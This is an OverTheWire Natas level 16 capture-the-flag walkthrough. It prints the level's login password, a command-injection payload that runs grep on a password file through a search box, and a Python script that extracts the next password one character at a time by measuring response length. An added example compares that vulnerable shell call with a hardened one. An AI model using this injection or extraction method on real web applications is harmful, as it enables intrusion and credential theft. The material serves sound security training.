OverTheWire Natas Level 15 -> Level 16 - Walkthrough
Introduction
In this post, I'll give you a walkthrough of the natas wargame Level 15 -> Level 16. We will create a Python script similar to the one from the previous level and get the password for the next level.
Goal
Login to natas16 and get the password for the next level.
Login details
URL - http://natas16.natas.labs.overthewire.org
Username - natas16
Password - TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
Theory
The grep command searches text for patterns. The '-i' option makes matching case-insensitive, and the '-E' option tells grep to treat the pattern as an extended regular expression.
The caret (^) is a regular-expression anchor that marks the start of a line. With grep, it matches the lines which start with the given string or pattern.
Similar to the previous level, we will create a Python script and get the password.
Solution
Open the URL in a browser. Enter the username and password mentioned above.
The screen below appears, showing an input box and a search button.
Let's click on "View sourcecode" to see the code.
The PHP code assigns the input from the user to the key variable. It then uses the preg_match() function to check whether certain characters are present in the input and, if they are, displays the message "input contains an illegal character". However, the characters '$', '(' and ')' are not filtered, so we can use them to insert our command.
On entering the command in the search box, we will not get any output if the character exists in the password. So an empty result tells us that the guessed character is part of the password. We will inject our code in the search box like this:
$(grep -E ^c.* /etc/natas_webpass/natas17)
Write the Python script below and save it on your system:
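import requests
import sys
from string import digits, ascii_lowercase, ascii_uppercase

# Candidate characters for each position of the password
characters = ascii_lowercase + ascii_uppercase + digits

s = requests.Session()
s.auth = ('natas16', 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V')

password = ""
while len(password) < 32:
    for c in characters:
        # The inner grep prints the password only if it starts with password + c
        payload = {'needle': '$(grep -E ^%s.* /etc/natas_webpass/natas17)' % (password + c)}
        response = s.get('http://natas16.natas.labs.overthewire.org/index.php', params=payload)
        # 1105 is the length of the page when the search shows no output
        if len(response.text) == 1105:
            sys.stdout.write(c)
            sys.stdout.flush()
            password += c
            break
    else:
        # No candidate matched this position; stop instead of looping forever
        break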
The above script builds the payload by combining the password found so far with each character tried by the for loop, and then passes the command to the web application. Only if the length of the returned text equals the page length is the character present in the password.
Run the script. After a few minutes, we will get the password on the screen.
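The following is an added example, not part of the original walkthrough or the level's source code. It reproduces the empty-versus-full output difference described above on constructed local files, next to a form of the search that hands the input to grep as a single argument without a shell. The file names, file contents and function names are assumptions made for the illustration.

```python
import os
import subprocess
import tempfile

# Constructed stand-ins for the level's word list and password file.
WORDS = "apple\nbanana\ncherry\n"
SECRET = "c0nstructedSecret\n"

def make_files(tmp):
    words = os.path.join(tmp, "dictionary.txt")
    secret = os.path.join(tmp, "secret.txt")
    with open(words, "w") as f:
        f.write(WORDS)
    with open(secret, "w") as f:
        f.write(SECRET)
    return words, secret

def search_vulnerable(needle, words):
    # Input is interpolated into a shell command line inside double quotes,
    # where the shell still expands $( ) before grep ever runs.
    cmd = 'grep -i "%s" %s' % (needle, words)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def search_hardened(needle, words):
    # No shell: the needle is one argv element. -F treats it as a fixed
    # string, -e marks it as the pattern even if it begins with "-".
    argv = ["grep", "-i", "-F", "-e", needle, "--", words]
    return subprocess.run(argv, capture_output=True, text=True).stdout

def demo():
    # Returns {guess: (vulnerable_output, hardened_output)} for one right
    # and one wrong first-character guess against the constructed secret.
    with tempfile.TemporaryDirectory() as tmp:
        words, secret = make_files(tmp)
        results = {}
        for guess in ("c", "x"):
            needle = "$(grep -E ^%s.* %s)" % (guess, secret)
            results[guess] = (search_vulnerable(needle, words),
                              search_hardened(needle, words))
        return results

if __name__ == "__main__":
    for guess, (vuln, safe) in demo().items():
        print(guess, "vulnerable:", repr(vuln), "hardened:", repr(safe))
```

In the vulnerable form the output depends on the secret, which is the signal the script above measures through the page length. In the hardened form both guesses return the same empty result, so the response carries no information about the file.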
This completes the walkthrough for Level 16, as we have got the password for natas17. Please post your questions and suggestions in the comment section.